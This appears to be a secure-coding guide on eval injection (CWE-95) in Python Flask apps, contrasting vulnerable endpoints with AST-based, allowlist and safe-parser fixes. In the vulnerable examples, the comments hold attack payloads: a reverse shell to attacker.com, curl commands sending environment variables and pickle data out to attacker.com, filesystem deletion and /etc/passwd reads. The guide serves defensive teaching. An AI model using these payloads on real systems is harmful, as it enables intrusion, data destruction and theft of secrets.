CWE-95: Eval Injection - Python
Overview
In Python applications, CWE-95 vulnerabilities occur when untrusted input is passed to dynamic code execution functions like eval(), exec(), compile(), __import__(), or similar constructs. Untrusted input can originate from HTTP requests, external APIs, databases, files, message queues, or any source outside the application's control. Python's dynamic nature makes it particularly susceptible to eval injection because these functions can execute arbitrary Python code with the full privileges of the application.
Primary Defence: Never use eval() or exec() with user input; use safe alternatives like ast.literal_eval() for evaluating literals, json.loads() for JSON data, implement math expression parsers (like numexpr or simpleeval) instead of eval, use configuration parsers (YAML, TOML, JSON) instead of executing Python code for config, avoid pickle for untrusted data and use JSON instead, and validate all input against strict allowlists to prevent arbitrary code execution.
Eval injection is especially dangerous in Python because attackers can import modules, access the file system, execute system commands through os.system() or subprocess, manipulate application state, steal environment variables, and even establish reverse shells. Unlike simpler injection vulnerabilities, eval injection gives attackers complete control over the Python interpreter.
Common scenarios include: accepting mathematical expressions and evaluating them with eval(), using exec() to dynamically execute configuration or plugin code, deserializing untrusted data with pickle, using __import__() based on untrusted input, and dynamically constructing code strings from untrusted input. Even seemingly safe uses of eval() with "trusted" input can be exploited through second-order injections or supply chain attacks.
This guidance demonstrates how to eliminate eval injection in Python by replacing dynamic code execution with safe alternatives like AST-based parsing, operator mapping, configuration parsers, and sandboxed execution environments.
Common Vulnerable Patterns
Direct eval() on Untrusted Input
# VULNERABLE - Direct evaluation of untrusted input
from flask import Flask, request, jsonify
app = Flask(__name__)
@app.route('/calculate', methods=['POST'])
def calculate():
expression = request.json.get('expression')
# CRITICAL VULNERABILITY - eval executes arbitrary code
result = eval(expression)
return jsonify({'result': result})
# Attack examples:
# {"expression": "__import__('os').system('rm -rf /')"}
# {"expression": "__import__('os').popen('cat /etc/passwd').read()"}
# {"expression": "open('/etc/passwd').read()"}
# {"expression": "__import__('subprocess').check_output(['whoami'])"}
# All of these execute with full application privileges!
exec() for Dynamic Code Execution
# VULNERABLE - Using exec() with untrusted code
from flask import Flask, request
app = Flask(__name__)
@app.route('/run-script', methods=['POST'])
def run_script():
script = request.json.get('script')
user_context = {}
# CRITICAL VULNERABILITY - exec runs arbitrary Python code
exec(script, user_context)
return {'output': user_context.get('result', 'No result')}
# Attack example:
# {
# "script": "import os; result = os.popen('ls -la /').read()"
# }
# Attacker gains full file system access!
# More sophisticated attack:
# {
# "script": """
# import socket, subprocess, os
# s = socket.socket()
# s.connect(('attacker.com', 4444))
# os.dup2(s.fileno(), 0)
# os.dup2(s.fileno(), 1)
# subprocess.call(['/bin/sh', '-i'])
# """
# }
# Establishes reverse shell to attacker!
Unsafe compile() and Code Objects
# VULNERABLE - Compiling and executing user code
from flask import Flask, request
app = Flask(__name__)
@app.route('/compile-run', methods=['POST'])
def compile_run():
code_string = request.json.get('code')
# CRITICAL VULNERABILITY - compile + eval executes arbitrary code
code_obj = compile(code_string, '<string>', 'eval')
result = eval(code_obj)
return {'result': str(result)}
# Attack example:
# {"code": "__import__('os').system('curl http://attacker.com?data=$(env)')"}
# Exfiltrates all environment variables including secrets!
Dynamic Import with import()
# VULNERABLE - Dynamic imports based on untrusted input
from flask import Flask, request
app = Flask(__name__)
@app.route('/load-plugin', methods=['POST'])
def load_plugin():
plugin_name = request.json.get('plugin')
# CRITICAL VULNERABILITY - arbitrary module import
module = __import__(plugin_name)
result = module.execute()
return {'result': result}
# Attack examples:
# {"plugin": "os"} then access os.system()
# {"plugin": "subprocess"} then execute commands
# {"plugin": "__main__"} then access application internals
# Attacker can import and use any Python module!
Unsafe pickle/yaml Deserialization
# VULNERABLE - Deserializing untrusted data
from flask import Flask, request
import pickle
import yaml
app = Flask(__name__)
@app.route('/load-data', methods=['POST'])
def load_data():
data = request.data
# CRITICAL VULNERABILITY - pickle can execute arbitrary code during deserialization
obj = pickle.loads(data)
return {'loaded': str(obj)}
# Attack: Craft malicious pickle payload
# import pickle, os
# class Exploit:
# def __reduce__(self):
# return (os.system, ('curl http://attacker.com?pwned=1',))
# payload = pickle.dumps(Exploit())
# Sends payload to /load-data endpoint
@app.route('/load-config', methods=['POST'])
def load_config():
config_yaml = request.data.decode()
# CRITICAL VULNERABILITY - yaml.load can execute Python code
config = yaml.load(config_yaml, Loader=yaml.Loader)
return {'config': config}
# Attack: YAML with Python object constructor
# !!python/object/apply:os.system ['whoami']
# Executes arbitrary system commands!
String Formatting with Format Strings
# VULNERABLE - Format string injection leading to code execution
from flask import Flask, request
app = Flask(__name__)
secret_api_key = "sk-1234567890abcdef"
@app.route('/format-message', methods=['POST'])
def format_message():
template = request.json.get('template')
user_name = request.json.get('name', 'User')
# VULNERABILITY - format allows access to global variables
message = template.format(name=user_name)
return {'message': message}
# Attack examples:
# {"template": "{name.__init__.__globals__[secret_api_key]}", "name": ""}
# Accesses global variables including secrets!
#
# {"template": "{name.__class__.__mro__[1].__subclasses__()}", "name": ""}
# Can enumerate all classes and potentially execute code
Secure Patterns
AST-based Safe Expression Evaluation
# SECURE - Using AST to safely parse and evaluate math expressions
from flask import Flask, request, jsonify
import ast
import operator
app = Flask(__name__)
class SafeMathEvaluator(ast.NodeVisitor):
"""Safely evaluate mathematical expressions without code execution"""
# Allowlist of safe operators
SAFE_OPERATORS = {
ast.Add: operator.add,
ast.Sub: operator.sub,
ast.Mult: operator.mul,
ast.Div: operator.truediv,
ast.Pow: operator.pow,
ast.Mod: operator.mod,
ast.USub: operator.neg,
ast.UAdd: operator.pos,
}
# Allowlist of safe functions
SAFE_FUNCTIONS = {
'abs': abs,
'min': min,
'max': max,
'round': round,
}
def eval_expr(self, expr_string: str):
"""Safely evaluate a mathematical expression"""
try:
# Parse the expression into an AST
tree = ast.parse(expr_string, mode='eval')
return self.visit(tree.body)
except (SyntaxError, ValueError, TypeError) as e:
raise ValueError(f"Invalid expression: {e}")
def visit_BinOp(self, node):
"""Handle binary operations (+, -, *, /, etc.)"""
if type(node.op) not in self.SAFE_OPERATORS:
raise ValueError(f"Unsafe operator: {node.op.__class__.__name__}")
left = self.visit(node.left)
right = self.visit(node.right)
op_func = self.SAFE_OPERATORS[type(node.op)]
return op_func(left, right)
def visit_UnaryOp(self, node):
"""Handle unary operations (-, +)"""
if type(node.op) not in self.SAFE_OPERATORS:
raise ValueError(f"Unsafe operator: {node.op.__class__.__name__}")
operand = self.visit(node.operand)
op_func = self.SAFE_OPERATORS[type(node.op)]
return op_func(operand)
def visit_Num(self, node):
"""Handle numbers"""
return node.n
def visit_Constant(self, node):
"""Handle constants (Python 3.8+)"""
if isinstance(node.value, (int, float)):
return node.value
raise ValueError(f"Unsafe constant type: {type(node.value)}")
def visit_Call(self, node):
"""Handle function calls (only allowlisted functions)"""
if not isinstance(node.func, ast.Name):
raise ValueError("Only simple function calls allowed")
func_name = node.func.id
if func_name not in self.SAFE_FUNCTIONS:
raise ValueError(f"Unsafe function: {func_name}")
args = [self.visit(arg) for arg in node.args]
func = self.SAFE_FUNCTIONS[func_name]
return func(*args)
def generic_visit(self, node):
"""Reject any AST node types not explicitly allowed"""
raise ValueError(f"Unsafe expression type: {node.__class__.__name__}")
@app.route('/calculate', methods=['POST'])
def calculate():
expression = request.json.get('expression')
if not expression or not isinstance(expression, str):
return jsonify({'error': 'Invalid expression'}), 400
# Limit expression length to prevent DoS
if len(expression) > 200:
return jsonify({'error': 'Expression too long'}), 400
try:
evaluator = SafeMathEvaluator()
result = evaluator.eval_expr(expression)
return jsonify({'result': result})
except ValueError as e:
return jsonify({'error': str(e)}), 400
except Exception as e:
# Log server-side, return generic error
app.logger.error(f'Calculation error: {e}', exc_info=True)
return jsonify({'error': 'Calculation failed'}), 500
# Safe to use with expressions like:
# "2 + 2"
# "3 * 4 + 5"
# "abs(-10)"
# "max(1, 2, 3) + min(4, 5)"
# Safely rejects dangerous inputs:
# "__import__('os').system('whoami')" → ValueError: Unsafe expression type
# "eval('malicious code')" → ValueError: Unsafe function
# "exec('print(1)')" → ValueError: Unsafe function
Why This Works
This pattern eliminates eval injection by using Python's Abstract Syntax Tree (AST) module to parse expressions into a structured tree representation that can be safely analyzed. Unlike eval() which executes whatever code is provided, AST parsing separates the parsing phase from execution, allowing us to inspect the expression structure and reject anything dangerous before evaluation. The SafeMathEvaluator only implements visit methods for safe node types (BinOp, UnaryOp, Num, Call) - any other node type triggers an error through generic_visit(), making it impossible to execute imports, attribute access, or function definitions.
The security relies on explicit allowlists at multiple levels. The SAFE_OPERATORS dictionary maps AST node types to Python's operator module functions, ensuring only basic arithmetic operations can execute. The SAFE_FUNCTIONS dictionary similarly restricts callable functions to a minimal set of mathematical builtins. When the parser encounters a function call, it validates the name against this allowlist before allowing execution. This architecture means attackers cannot access dangerous functions like import(), open(), or exec() even if they try to inject them - the AST visitor pattern simply doesn't handle those node types.
Compared to eval() with restricted builtins, this approach is fundamentally more secure because it operates at the syntax level rather than the runtime level. While restricted globals can be escaped through constructor chains and other techniques (like ().class.bases[0].subclasses()), AST validation prevents these constructs from being parsed at all. The pattern offers excellent performance since parsing and validation happen in a single pass, and it can be extended with additional safe operators or functions by updating the allowlists. For production use, this is the gold standard for safe expression evaluation in Python.
Operator Mapping with Explicit Allowlist
# SECURE - Using dictionary mapping instead of dynamic execution
from flask import Flask, request, jsonify
from typing import Callable, Dict, Any
app = Flask(__name__)
class SafeOperationHandler:
"""Handle user-requested operations through explicit mapping"""
def __init__(self):
# Explicit allowlist of safe operations
self.operations: Dict[str, Callable] = {
'add': self.add,
'subtract': self.subtract,
'multiply': self.multiply,
'divide': self.divide,
'power': self.power,
}
def add(self, a: float, b: float) -> float:
return a + b
def subtract(self, a: float, b: float) -> float:
return a - b
def multiply(self, a: float, b: float) -> float:
return a * b
def divide(self, a: float, b: float) -> float:
if b == 0:
raise ValueError("Division by zero")
return a / b
def power(self, a: float, b: float) -> float:
# Limit exponent to prevent DoS
if abs(b) > 100:
raise ValueError("Exponent too large")
return a ** b
def execute(self, operation: str, a: Any, b: Any) -> float:
"""Execute operation if it's in the allowlist"""
# Validate operation is allowed
if operation not in self.operations:
raise ValueError(f"Invalid operation: {operation}")
# Validate and convert inputs
try:
a_num = float(a)
b_num = float(b)
except (ValueError, TypeError):
raise ValueError("Invalid numeric inputs")
# Execute the allowlisted operation
operation_func = self.operations[operation]
return operation_func(a_num, b_num)
@app.route('/calculate', methods=['POST'])
def calculate():
data = request.json
operation = data.get('operation')
a = data.get('a')
b = data.get('b')
try:
handler = SafeOperationHandler()
result = handler.execute(operation, a, b)
return jsonify({'result': result})
except ValueError as e:
return jsonify({'error': str(e)}), 400
except Exception as e:
app.logger.error(f'Calculation error: {e}', exc_info=True)
return jsonify({'error': 'Calculation failed'}), 500
# Usage:
# POST /calculate {"operation": "add", "a": 5, "b": 3} → 8
# POST /calculate {"operation": "multiply", "a": 4, "b": 7} → 28
# Safely rejects:
# POST /calculate {"operation": "__import__('os').system('ls')", ...}
# → "Invalid operation" error, no code execution
Why This Works
This pattern prevents eval injection by replacing dynamic code execution with a simple dictionary lookup mechanism. Instead of evaluating user input as Python code, the system treats operation names as dictionary keys that must match predefined entries. The operations dictionary maps string keys to function objects (Python methods), and the execute() method performs a safe lookup without any code interpretation. If an attacker tries to inject code like "import('os').system('ls')", it's simply treated as a dictionary key that doesn't exist, causing the validation to raise an error.
The type validation ensures all inputs are converted to floats before being passed to operation functions, preventing type confusion attacks. Each operation function implements its own safety checks - the divide function validates the divisor isn't zero, the power function limits exponent magnitude to prevent denial-of-service through enormous computations. This localized validation makes the code easy to audit and maintain, since each operation's security properties are self-contained. The pattern is also highly testable, with each operation function easily unit-tested in isolation.
Compared to eval() which gives attackers access to the entire Python language including imports, file system access, and network operations, this approach provides exactly the functionality needed and nothing more. The performance is excellent since there's no parsing or compilation overhead - just a dictionary lookup and function call. For applications needing user-selectable operations (calculators, data processing pipelines, configuration-driven workflows), this pattern is ideal. It can be extended with new operations by simply adding dictionary entries, and the type system ensures compile-time safety for operation implementations.
Configuration Parsing with Safe Libraries
# SECURE - Using safe configuration parsers instead of exec/eval
from flask import Flask, request, jsonify
import json
import configparser
import yaml
from typing import Dict, Any
app = Flask(__name__)
class SafeConfigLoader:
"""Safely load configuration without code execution"""
@staticmethod
def load_json_config(config_string: str) -> Dict[str, Any]:
"""Load JSON configuration (safe, no code execution)"""
try:
config = json.loads(config_string)
# Validate config structure
if not isinstance(config, dict):
raise ValueError("Config must be a dictionary")
# Validate all values are safe types
SafeConfigLoader._validate_safe_types(config)
return config
except json.JSONDecodeError as e:
raise ValueError(f"Invalid JSON: {e}")
@staticmethod
def load_yaml_config(config_string: str) -> Dict[str, Any]:
"""Load YAML configuration with SafeLoader (no code execution)"""
try:
# CRITICAL: Use SafeLoader, NOT Loader
config = yaml.load(config_string, Loader=yaml.SafeLoader)
# Validate config structure
if not isinstance(config, dict):
raise ValueError("Config must be a dictionary")
# Validate all values are safe types
SafeConfigLoader._validate_safe_types(config)
return config
except yaml.YAMLError as e:
raise ValueError(f"Invalid YAML: {e}")
@staticmethod
def load_ini_config(config_string: str) -> Dict[str, Dict[str, str]]:
"""Load INI configuration (safe, no code execution)"""
try:
config = configparser.ConfigParser()
config.read_string(config_string)
# Convert to dict
result = {
section: dict(config[section])
for section in config.sections()
}
return result
except configparser.Error as e:
raise ValueError(f"Invalid INI: {e}")
@staticmethod
def _validate_safe_types(obj: Any, depth: int = 0) -> None:
"""Recursively validate only safe types are present"""
# Prevent deeply nested structures (DoS protection)
if depth > 10:
raise ValueError("Configuration too deeply nested")
# Allowlist of safe types
safe_types = (str, int, float, bool, type(None))
if isinstance(obj, dict):
for key, value in obj.items():
if not isinstance(key, str):
raise ValueError(f"Dict keys must be strings, got {type(key)}")
SafeConfigLoader._validate_safe_types(value, depth + 1)
elif isinstance(obj, list):
for item in obj:
SafeConfigLoader._validate_safe_types(item, depth + 1)
elif not isinstance(obj, safe_types):
raise ValueError(f"Unsafe type in config: {type(obj)}")
@app.route('/load-config', methods=['POST'])
def load_config():
config_data = request.json.get('config')
config_format = request.json.get('format', 'json')
if not config_data or not isinstance(config_data, str):
return jsonify({'error': 'Invalid config data'}), 400
# Limit config size to prevent DoS
if len(config_data) > 1_000_000: # 1MB limit
return jsonify({'error': 'Config too large'}), 400
try:
loader = SafeConfigLoader()
if config_format == 'json':
config = loader.load_json_config(config_data)
elif config_format == 'yaml':
config = loader.load_yaml_config(config_data)
elif config_format == 'ini':
config = loader.load_ini_config(config_data)
else:
return jsonify({'error': 'Invalid format'}), 400
return jsonify({'config': config})
except ValueError as e:
return jsonify({'error': str(e)}), 400
except Exception as e:
app.logger.error(f'Config loading error: {e}', exc_info=True)
return jsonify({'error': 'Failed to load config'}), 500
# Safe configs:
# JSON: {"db_host": "localhost", "port": 5432}
# YAML: |
# database:
# host: localhost
# port: 5432
# Safely rejects dangerous configs:
# YAML with !!python/object: → SafeLoader blocks it
# JSON with executable code: → No way to inject code in JSON
Why This Works
This pattern eliminates code injection during configuration loading by using libraries designed for safe data deserialization. Python's json module is inherently safe because JSON is a pure data format with no mechanism for encoding executable code or Python objects. The yaml.SafeLoader explicitly blocks YAML's dangerous features like arbitrary object instantiation through !!python/object tags, ensuring YAML files can only contain standard data types. ConfigParser similarly only handles key-value pairs as strings, preventing code execution. By validating that the resulting configuration contains only safe primitive types, the code ensures no malicious objects with dangerous init or del methods can be injected.
The recursive type validation provides defense-in-depth by traversing the entire configuration tree and rejecting any unexpected types. Depth limits prevent stack overflow attacks through deeply nested structures, while size limits prevent memory exhaustion. This validation catches edge cases where libraries might allow complex types in specific contexts. The allowlist approach to type validation (only str, int, float, bool, None are allowed) means new attack vectors involving exotic types are automatically blocked.
Compared to using eval() or exec() to load Python code as configuration (a surprisingly common antipattern), this approach provides all the flexibility of structured configuration without code execution risks. JSON is ideal for simple configurations and is cross-language compatible. YAML supports more complex structures and is human-friendly for editing. INI files work well for simple key-value configs. For applications that previously loaded Python config files, migrating to JSON/YAML with validation is straightforward and significantly improves security. Never use pickle or yaml.load() with Loader=yaml.Loader for untrusted config data - these can execute arbitrary code during deserialization.
Plugin System with Controlled Imports
# SECURE - Controlled plugin loading with allowlist
from flask import Flask, request, jsonify
import importlib
from typing import Dict, Any, Protocol
app = Flask(__name__)
class PluginInterface(Protocol):
"""Protocol defining the required plugin interface"""
def execute(self, **kwargs) -> Dict[str, Any]:
"""Execute the plugin with given parameters"""
...
class SafePluginLoader:
"""Safely load and execute plugins from allowlist"""
def __init__(self):
# Explicit allowlist of approved plugins
self.allowed_plugins = {
'data_validator': 'plugins.validators.DataValidator',
'report_generator': 'plugins.reports.ReportGenerator',
'email_sender': 'plugins.email.EmailSender',
}
# Cache loaded plugins
self._plugin_cache: Dict[str, PluginInterface] = {}
def load_plugin(self, plugin_name: str) -> PluginInterface:
"""Load a plugin if it's in the allowlist"""
# Validate plugin name is in allowlist
if plugin_name not in self.allowed_plugins:
raise ValueError(f"Plugin not allowed: {plugin_name}")
# Check cache
if plugin_name in self._plugin_cache:
return self._plugin_cache[plugin_name]
# Get the full module path from allowlist
module_path = self.allowed_plugins[plugin_name]
try:
# Split module path and class name
module_name, class_name = module_path.rsplit('.', 1)
# Import the specific module (not untrusted!)
module = importlib.import_module(module_name)
# Get the specific class
plugin_class = getattr(module, class_name)
# Instantiate the plugin
plugin_instance = plugin_class()
# Validate it implements the interface
if not hasattr(plugin_instance, 'execute'):
raise ValueError("Plugin missing required execute method")
# Cache and return
self._plugin_cache[plugin_name] = plugin_instance
return plugin_instance
except (ImportError, AttributeError) as e:
raise ValueError(f"Failed to load plugin: {e}")
def execute_plugin(self, plugin_name: str, **kwargs) -> Dict[str, Any]:
"""Load and execute a plugin safely"""
plugin = self.load_plugin(plugin_name)
# Validate parameters
validated_kwargs = self._validate_parameters(kwargs)
# Execute plugin
return plugin.execute(**validated_kwargs)
@staticmethod
def _validate_parameters(params: Dict[str, Any]) -> Dict[str, Any]:
"""Validate plugin parameters are safe types"""
safe_types = (str, int, float, bool, type(None), list, dict)
validated = {}
for key, value in params.items():
if not isinstance(key, str):
raise ValueError("Parameter keys must be strings")
if not isinstance(value, safe_types):
raise ValueError(f"Unsafe parameter type: {type(value)}")
validated[key] = value
return validated
@app.route('/run-plugin', methods=['POST'])
def run_plugin():
plugin_name = request.json.get('plugin')
parameters = request.json.get('parameters', {})
if not plugin_name or not isinstance(plugin_name, str):
return jsonify({'error': 'Invalid plugin name'}), 400
if not isinstance(parameters, dict):
return jsonify({'error': 'Parameters must be a dictionary'}), 400
try:
loader = SafePluginLoader()
result = loader.execute_plugin(plugin_name, **parameters)
return jsonify({'result': result})
except ValueError as e:
return jsonify({'error': str(e)}), 400
except Exception as e:
app.logger.error(f'Plugin execution error: {e}', exc_info=True)
return jsonify({'error': 'Plugin execution failed'}), 500
# Usage:
# POST /run-plugin {
# "plugin": "data_validator",
# "parameters": {"data": "test"}
# } → Executes plugins.validators.DataValidator
# Safely rejects:
# POST /run-plugin {"plugin": "os.system"} → "Plugin not allowed" error
# POST /run-plugin {"plugin": "__import__"} → "Plugin not allowed" error
Why This Works
This pattern eliminates import-based code injection by strictly controlling which modules can be loaded through an explicit allowlist. Instead of passing user-provided strings to import() or importlib.import_module(), the system maps user-facing plugin names to hardcoded module paths that developers have vetted. Attackers cannot import dangerous modules like os, subprocess, or sys because only the plugins explicitly registered in the allowed_plugins dictionary can be imported. The module paths are trusted constants defined at development time, not runtime values from external input.
The interface enforcement through Protocol typing ensures all loaded plugins conform to a known contract with an execute() method signature. Parameter validation restricts plugin inputs to safe primitive types (str, int, float, bool, None, list, dict), preventing object injection where malicious objects with custom reduce methods could execute code during pickle serialization or other operations. The dataclass-based typing provides compile-time safety and runtime validation. The caching mechanism prevents repeated imports that could trigger module-level code execution multiple times.
Compared to dynamic imports with path sanitization (which can often be bypassed through techniques like null bytes or Unicode normalization), an allowlist approach has no bypass potential - only the predefined modules are accessible. For applications requiring extensibility, this pattern allows adding plugins by updating configuration without changing core code. The Protocol interface (PEP 544) provides structural typing, allowing plugins to be developed independently as long as they implement the required execute() method. This pattern integrates well with modern Python packaging where plugins can be separate packages referenced by name.
Safe Deserialization Alternatives
# SECURE - Safe alternatives to pickle deserialization
from flask import Flask, request, jsonify
import json
from typing import Any, Dict
from dataclasses import dataclass, asdict
import yaml
app = Flask(__name__)
@dataclass
class UserData:
"""Type-safe data class for user information"""
user_id: int
username: str
email: str
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> 'UserData':
"""Safely construct from dictionary with validation"""
try:
return cls(
user_id=int(data['user_id']),
username=str(data['username']),
email=str(data['email'])
)
except (KeyError, ValueError, TypeError) as e:
raise ValueError(f"Invalid user data: {e}")
class SafeSerializer:
"""Safe serialization without code execution risks"""
@staticmethod
def serialize_to_json(obj: Any) -> str:
"""Serialize object to JSON (safe)"""
if hasattr(obj, '__dict__'):
# Convert to dict
obj = asdict(obj) if hasattr(obj, '__dataclass_fields__') else obj.__dict__
return json.dumps(obj)
@staticmethod
def deserialize_from_json(data: str, expected_class: type = None) -> Any:
"""Deserialize from JSON with optional type validation"""
try:
obj = json.loads(data)
if expected_class:
# Validate and construct typed object
if hasattr(expected_class, 'from_dict'):
return expected_class.from_dict(obj)
else:
raise ValueError("Class must implement from_dict method")
return obj
except json.JSONDecodeError as e:
raise ValueError(f"Invalid JSON: {e}")
@staticmethod
def deserialize_from_yaml_safe(data: str) -> Dict[str, Any]:
"""Deserialize YAML with SafeLoader (no code execution)"""
try:
# CRITICAL: SafeLoader, not Loader or UnsafeLoader
return yaml.load(data, Loader=yaml.SafeLoader)
except yaml.YAMLError as e:
raise ValueError(f"Invalid YAML: {e}")
@app.route('/save-user', methods=['POST'])
def save_user():
"""Safely serialize user data"""
user_data = request.json
try:
# Validate and construct typed object
user = UserData.from_dict(user_data)
# Serialize to JSON (safe)
serialized = SafeSerializer.serialize_to_json(user)
# Store serialized data (e.g., in database)
return jsonify({'saved': serialized})
except ValueError as e:
return jsonify({'error': str(e)}), 400
@app.route('/load-user', methods=['POST'])
def load_user():
"""Safely deserialize user data"""
serialized_data = request.json.get('data')
if not serialized_data or not isinstance(serialized_data, str):
return jsonify({'error': 'Invalid data'}), 400
try:
# Deserialize with type validation (safe)
user = SafeSerializer.deserialize_from_json(
serialized_data,
expected_class=UserData
)
return jsonify({'user': asdict(user)})
except ValueError as e:
return jsonify({'error': str(e)}), 400
# NEVER use pickle for untrusted data:
# pickle.loads(user_input) # DANGEROUS!
# json.loads(user_input) # SAFE
# yaml.safe_load(user_input) # SAFE
Why This Works
This pattern eliminates deserialization vulnerabilities by replacing pickle with JSON, which fundamentally cannot encode executable code. Python's pickle module is dangerous with untrusted data because it can trigger arbitrary code execution through reduce methods and similar hooks - attackers can craft serialized objects that execute commands when unpickled. JSON has no such mechanism because it's a pure data format supporting only strings, numbers, booleans, nulls, arrays, and objects. The json module deserializes data by constructing Python objects (dict, list, str, etc.) without executing any custom code.
Using dataclasses with explicit from_dict constructors provides type safety and validation. The deserializer only populates the fields defined in the dataclass, and the from_dict method performs explicit type conversion and validation for each field. This prevents polymorphic deserialization attacks where attackers inject unexpected types. The pattern is self-documenting since the dataclass clearly defines what fields are expected and their types. Type hints enable static analysis tools like mypy to catch serialization errors at development time.
For applications that previously used pickle for session storage, caching, or inter-process communication, migrating to JSON is straightforward. JSON is human-readable for debugging, cross-language compatible (unlike pickle which is Python-specific), and has excellent library support. YAML with SafeLoader provides similar security with support for more complex data structures and comments. If you need to preserve object graphs with circular references or custom classes, use libraries like marshmallow or pydantic which provide controlled serialization with validation. Never use pickle.loads() on untrusted data - it's fundamentally unsafe regardless of how carefully you validate the input.
Template Rendering with Auto-Escaping
# SECURE - Safe template rendering with Jinja2 auto-escaping
from flask import Flask, request, render_template_string, jsonify
from jinja2 import Environment, select_autoescape, TemplateSyntaxError
from markupsafe import Markup
app = Flask(__name__)
# Configure Jinja2 with auto-escaping enabled
app.jinja_env.autoescape = select_autoescape(
enabled_extensions=('html', 'xml', 'jinja2'),
default_for_string=True,
)
class SafeTemplateRenderer:
"""Safely render templates without code execution"""
def __init__(self):
self.env = Environment(
autoescape=True,
# Disable dangerous features
extensions=[],
)
# Allowlist of safe filters
self.env.filters = {
'upper': str.upper,
'lower': str.lower,
'title': str.title,
'length': len,
}
def render(self, template_string: str, context: dict) -> str:
"""Render template with untrusted context"""
# Validate template string doesn't contain dangerous tags
if any(dangerous in template_string for dangerous in ['{{', '}}', '{%', '%}']):
# User provides data, not template logic
raise ValueError("Template string cannot contain Jinja2 syntax")
# Pre-defined safe template
safe_template = """
<div class="message">
<h2>{{ title }}</h2>
<p>{{ content }}</p>
<small>From: {{ author }}</small>
</div>
"""
# Validate context
validated_context = self._validate_context(context)
try:
template = self.env.from_string(safe_template)
return template.render(**validated_context)
except TemplateSyntaxError as e:
raise ValueError(f"Template syntax error: {e}")
@staticmethod
def _validate_context(context: dict) -> dict:
"""Validate all context values are safe types"""
safe_types = (str, int, float, bool, type(None))
validated = {}
for key, value in context.items():
if not isinstance(key, str):
raise ValueError("Context keys must be strings")
if not isinstance(value, safe_types):
raise ValueError(f"Unsafe context type: {type(value)}")
validated[key] = value
return validated
@app.route('/render-message', methods=['POST'])
def render_message():
"""Render a message using safe template"""
context = request.json
if not isinstance(context, dict):
return jsonify({'error': 'Context must be a dictionary'}), 400
try:
renderer = SafeTemplateRenderer()
html = renderer.render("", context)
return jsonify({'html': html})
except ValueError as e:
return jsonify({'error': str(e)}), 400
# Safe usage:
# POST /render-message {
# "title": "Hello",
# "content": "This is a message",
# "author": "John"
# }
# Safely rejects:
# POST /render-message {
# "content": "{{ config }}" # Escaped as text, not executed
# }
Why This Works
This pattern prevents eval injection in template rendering by strictly separating template structure from user-provided data. The critical security principle is that templates are trusted code written by developers, while users provide only data values to populate those templates. Jinja2's auto-escaping ensures that user data containing HTML or script tags is converted to safe text ("<script>" instead of "<script>"), preventing XSS attacks. The template engine parses templates into bytecode at compile time and executes this bytecode to render output, but user data is never interpreted as template code - it's only inserted as values.
The context validation ensures only safe primitive types can be passed to templates. This prevents injection of objects with dangerous str or repr methods that might execute code when the template tries to render them. By disabling dangerous Jinja2 features through environment configuration and restricting available filters to a safe subset, the code limits what templates can do even if an attacker somehow controls template content. The pattern validates that user input doesn't contain Jinja2 syntax markers ({{ }}, {% %}), ensuring users cannot inject template directives.
For applications where users need to customize templates (email notifications, reports), provide a controlled template language with limited capabilities. Jinja2's sandboxed environment can restrict access to attributes and operations, but for maximum security, use a simpler template language designed for untrusted templates like Liquid or a custom domain-specific language. Never use string concatenation or f-strings to build templates from user input - always use the template engine's parameter binding. Template engines like Jinja2, Mako, and Django templates all support safe data interpolation, but only when templates come from trusted sources and users provide data only.
Verification
After implementing the recommended secure patterns, verify the fix through multiple approaches:
- Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations
- Code review: Confirm all instances use the secure pattern (parameterized queries, safe APIs, proper encoding) with no string concatenation or unsafe operations
- Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
- Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
- Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
- Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
- Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
- Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced